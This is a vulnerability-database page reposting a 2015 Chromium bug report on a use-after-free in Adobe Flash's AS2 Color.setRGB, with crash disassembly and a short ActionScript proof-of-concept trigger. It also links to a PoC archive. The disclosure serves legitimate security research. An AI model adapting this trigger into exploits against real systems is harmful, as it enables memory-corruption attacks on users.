Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Flash AS2 - Color.setRGB Use-After-Free

🗓️ 19 Aug 2015 00:00:00Reported by bilouType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 36 Views

Adobe Flash AS2 Color.setRGB Use-After-Free vulnerability in Chrome 42.0.2311.90 with Flash 17.0.0.169 on Win7 x64 SP

Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=367&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for Chromium VRP bug https://code.google.com/p/chromium/issues/detail?id=484610]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object used in the Color constructor while a reference remains in the stack.

VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1

REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField etc. While calling Color.setRGB with a custom object, it is possible to execute arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):

.text:004B82D0                 push    esi
.text:004B82D1                 mov     esi, [esp+4+arg_0]
.text:004B82D5                 push    edi
.text:004B82D6                 mov     edi, ecx
.text:004B82D8                 mov     ecx, [edi+94h]  ; edi points to freed memory
.text:004B82DE                 and     ecx, 0FFFFFFFEh
.text:004B82E1                 add     ecx, 3Ch
.text:004B82E4                 mov     eax, esi
.text:004B82E6                 call    sub_4B0724      ; crash below
...
.text:004B0724                 mov     edx, [ecx]      ; crash here ecx = 3ch (null pointer)
.text:004B0726                 cmp     edx, [eax]
.text:004B0728                 jnz     short loc_4B077E


Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
	tf.removeTextField()
	return 0x41414142
}

var c = new Color(tf)
c.setRGB(o)
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4
adobe flash as2color.setrgbuse-after-freechrome 42.0.2311.90flash 17.0.0.169win7 x64 sp1uafchromium vulnerability rewards program
36